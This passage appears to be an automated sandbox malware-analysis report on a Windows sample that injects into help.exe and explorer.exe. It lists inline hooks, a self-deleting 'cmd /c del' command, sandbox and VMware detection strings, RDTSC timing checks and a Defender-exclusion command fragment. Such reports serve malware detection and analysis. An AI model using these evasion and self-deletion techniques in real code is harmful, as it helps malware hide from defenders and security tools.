          Source: 4.0.VJaX7U6LAp.exe.b40000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.VJaX7U6LAp.exe.b40000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.VJaX7U6LAp.exe.b40000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 0_2_00148F06 push cs; ret 0_2_00148F07
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00401026 push ebp; ret 4_2_00401027
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004170A5 push esp; ret 4_2_004170A7
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041713B push cs; ret 4_2_0041713C
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041D1E3 pushfd ; retf 4_2_0041D1F3
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_004165D6 push ebx; ret 4_2_004165D7
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEF2 push eax; ret 4_2_0041CEF8
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEFB push eax; ret 4_2_0041CF62
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CEA5 push eax; ret 4_2_0041CEF8
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0041CF5C push eax; ret 4_2_0041CF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B4D0D1 push ecx; ret 11_2_02B4D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004970A5 push esp; ret 11_2_004970A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049713B push cs; ret 11_2_0049713C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049D1E3 pushfd ; retf 11_2_0049D1F3
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049D9AF push cs; iretd 11_2_0049D9B2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_004965D6 push ebx; ret 11_2_004965D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEFB push eax; ret 11_2_0049CF62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEF2 push eax; ret 11_2_0049CEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CEA5 push eax; ret 11_2_0049CEF8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_0049CF5C push eax; ret 11_2_0049CF62

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\help.exeProcess created: /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
          Source: C:\Windows\SysWOW64\help.exeProcess created: /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'Jump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.269d120.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: VJaX7U6LAp.exe PID: 6316, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000004898E4 second address: 00000000004898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000000489B4E second address: 0000000000489B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe TID: 4756Thread sleep time: -39557s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe TID: 5112Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6196Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 5536Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00409A80 rdtsc 4_2_00409A80
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeThread delayed: delay time: 39557Jump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.372623370.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.393924911.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.368004715.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.393924911.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.368004715.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.372313335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000006.00000000.372313335.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.372623370.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_00409A80 rdtsc 4_2_00409A80
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0AAB0 mov eax, dword ptr fs:[00000030h]11_2_02B0AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0AAB0 mov eax, dword ptr fs:[00000030h]11_2_02B0AAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2FAB0 mov eax, dword ptr fs:[00000030h]11_2_02B2FAB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF52A5 mov eax, dword ptr fs:[00000030h]11_2_02AF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF52A5 mov eax, dword ptr fs:[00000030h]11_2_02AF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF52A5 mov eax, dword ptr fs:[00000030h]11_2_02AF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF52A5 mov eax, dword ptr fs:[00000030h]11_2_02AF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF52A5 mov eax, dword ptr fs:[00000030h]11_2_02AF52A5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2D294 mov eax, dword ptr fs:[00000030h]11_2_02B2D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2D294 mov eax, dword ptr fs:[00000030h]11_2_02B2D294
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22AE4 mov eax, dword ptr fs:[00000030h]11_2_02B22AE4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22ACB mov eax, dword ptr fs:[00000030h]11_2_02B22ACB
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B34A2C mov eax, dword ptr fs:[00000030h]11_2_02B34A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B34A2C mov eax, dword ptr fs:[00000030h]11_2_02B34A2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B13A1C mov eax, dword ptr fs:[00000030h]11_2_02B13A1C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBAA16 mov eax, dword ptr fs:[00000030h]11_2_02BBAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBAA16 mov eax, dword ptr fs:[00000030h]11_2_02BBAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFAA16 mov eax, dword ptr fs:[00000030h]11_2_02AFAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFAA16 mov eax, dword ptr fs:[00000030h]11_2_02AFAA16
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B08A0A mov eax, dword ptr fs:[00000030h]11_2_02B08A0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF5210 mov eax, dword ptr fs:[00000030h]11_2_02AF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF5210 mov ecx, dword ptr fs:[00000030h]11_2_02AF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF5210 mov eax, dword ptr fs:[00000030h]11_2_02AF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF5210 mov eax, dword ptr fs:[00000030h]11_2_02AF5210
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B3927A mov eax, dword ptr fs:[00000030h]11_2_02B3927A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BAB260 mov eax, dword ptr fs:[00000030h]11_2_02BAB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BAB260 mov eax, dword ptr fs:[00000030h]11_2_02BAB260
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8A62 mov eax, dword ptr fs:[00000030h]11_2_02BC8A62
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBEA55 mov eax, dword ptr fs:[00000030h]11_2_02BBEA55
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9240 mov eax, dword ptr fs:[00000030h]11_2_02AF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9240 mov eax, dword ptr fs:[00000030h]11_2_02AF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9240 mov eax, dword ptr fs:[00000030h]11_2_02AF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9240 mov eax, dword ptr fs:[00000030h]11_2_02AF9240
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B84257 mov eax, dword ptr fs:[00000030h]11_2_02B84257
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC5BA5 mov eax, dword ptr fs:[00000030h]11_2_02BC5BA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24BAD mov eax, dword ptr fs:[00000030h]11_2_02B24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24BAD mov eax, dword ptr fs:[00000030h]11_2_02B24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24BAD mov eax, dword ptr fs:[00000030h]11_2_02B24BAD
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2B390 mov eax, dword ptr fs:[00000030h]11_2_02B2B390
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22397 mov eax, dword ptr fs:[00000030h]11_2_02B22397
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB138A mov eax, dword ptr fs:[00000030h]11_2_02BB138A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BAD380 mov ecx, dword ptr fs:[00000030h]11_2_02BAD380
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B01B8F mov eax, dword ptr fs:[00000030h]11_2_02B01B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B01B8F mov eax, dword ptr fs:[00000030h]11_2_02B01B8F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B203E2 mov eax, dword ptr fs:[00000030h]11_2_02B203E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1DBE9 mov eax, dword ptr fs:[00000030h]11_2_02B1DBE9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B753CA mov eax, dword ptr fs:[00000030h]11_2_02B753CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B753CA mov eax, dword ptr fs:[00000030h]11_2_02B753CA
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB131B mov eax, dword ptr fs:[00000030h]11_2_02BB131B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B23B7A mov eax, dword ptr fs:[00000030h]11_2_02B23B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B23B7A mov eax, dword ptr fs:[00000030h]11_2_02B23B7A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFDB60 mov ecx, dword ptr fs:[00000030h]11_2_02AFDB60
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8B58 mov eax, dword ptr fs:[00000030h]11_2_02BC8B58
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFDB40 mov eax, dword ptr fs:[00000030h]11_2_02AFDB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFF358 mov eax, dword ptr fs:[00000030h]11_2_02AFF358
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2F0BF mov ecx, dword ptr fs:[00000030h]11_2_02B2F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2F0BF mov eax, dword ptr fs:[00000030h]11_2_02B2F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2F0BF mov eax, dword ptr fs:[00000030h]11_2_02B2F0BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B220A0 mov eax, dword ptr fs:[00000030h]11_2_02B220A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B390AF mov eax, dword ptr fs:[00000030h]11_2_02B390AF
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9080 mov eax, dword ptr fs:[00000030h]11_2_02AF9080
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B73884 mov eax, dword ptr fs:[00000030h]11_2_02B73884
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B73884 mov eax, dword ptr fs:[00000030h]11_2_02B73884
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF58EC mov eax, dword ptr fs:[00000030h]11_2_02AF58EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF40E1 mov eax, dword ptr fs:[00000030h]11_2_02AF40E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF40E1 mov eax, dword ptr fs:[00000030h]11_2_02AF40E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF40E1 mov eax, dword ptr fs:[00000030h]11_2_02AF40E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov eax, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov ecx, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov eax, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov eax, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov eax, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8B8D0 mov eax, dword ptr fs:[00000030h]11_2_02B8B8D0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0B02A mov eax, dword ptr fs:[00000030h]11_2_02B0B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0B02A mov eax, dword ptr fs:[00000030h]11_2_02B0B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0B02A mov eax, dword ptr fs:[00000030h]11_2_02B0B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0B02A mov eax, dword ptr fs:[00000030h]11_2_02B0B02A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2002D mov eax, dword ptr fs:[00000030h]11_2_02B2002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2002D mov eax, dword ptr fs:[00000030h]11_2_02B2002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2002D mov eax, dword ptr fs:[00000030h]11_2_02B2002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2002D mov eax, dword ptr fs:[00000030h]11_2_02B2002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2002D mov eax, dword ptr fs:[00000030h]11_2_02B2002D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77016 mov eax, dword ptr fs:[00000030h]11_2_02B77016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77016 mov eax, dword ptr fs:[00000030h]11_2_02B77016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77016 mov eax, dword ptr fs:[00000030h]11_2_02B77016
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC4015 mov eax, dword ptr fs:[00000030h]11_2_02BC4015
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC4015 mov eax, dword ptr fs:[00000030h]11_2_02BC4015
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB2073 mov eax, dword ptr fs:[00000030h]11_2_02BB2073
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC1074 mov eax, dword ptr fs:[00000030h]11_2_02BC1074
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B10050 mov eax, dword ptr fs:[00000030h]11_2_02B10050
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B10050 mov eax, dword ptr fs:[00000030h]11_2_02B10050
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B751BE mov eax, dword ptr fs:[00000030h]11_2_02B751BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B751BE mov eax, dword ptr fs:[00000030h]11_2_02B751BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B751BE mov eax, dword ptr fs:[00000030h]11_2_02B751BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B751BE mov eax, dword ptr fs:[00000030h]11_2_02B751BE
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B769A6 mov eax, dword ptr fs:[00000030h]11_2_02B769A6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B261A0 mov eax, dword ptr fs:[00000030h]11_2_02B261A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B261A0 mov eax, dword ptr fs:[00000030h]11_2_02B261A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB49A4 mov eax, dword ptr fs:[00000030h]11_2_02BB49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB49A4 mov eax, dword ptr fs:[00000030h]11_2_02BB49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB49A4 mov eax, dword ptr fs:[00000030h]11_2_02BB49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB49A4 mov eax, dword ptr fs:[00000030h]11_2_02BB49A4
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22990 mov eax, dword ptr fs:[00000030h]11_2_02B22990
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1C182 mov eax, dword ptr fs:[00000030h]11_2_02B1C182
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A185 mov eax, dword ptr fs:[00000030h]11_2_02B2A185
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFB1E1 mov eax, dword ptr fs:[00000030h]11_2_02AFB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFB1E1 mov eax, dword ptr fs:[00000030h]11_2_02AFB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFB1E1 mov eax, dword ptr fs:[00000030h]11_2_02AFB1E1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B841E8 mov eax, dword ptr fs:[00000030h]11_2_02B841E8
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2513A mov eax, dword ptr fs:[00000030h]11_2_02B2513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2513A mov eax, dword ptr fs:[00000030h]11_2_02B2513A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B14120 mov eax, dword ptr fs:[00000030h]11_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B14120 mov eax, dword ptr fs:[00000030h]11_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B14120 mov eax, dword ptr fs:[00000030h]11_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B14120 mov eax, dword ptr fs:[00000030h]11_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B14120 mov ecx, dword ptr fs:[00000030h]11_2_02B14120
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9100 mov eax, dword ptr fs:[00000030h]11_2_02AF9100
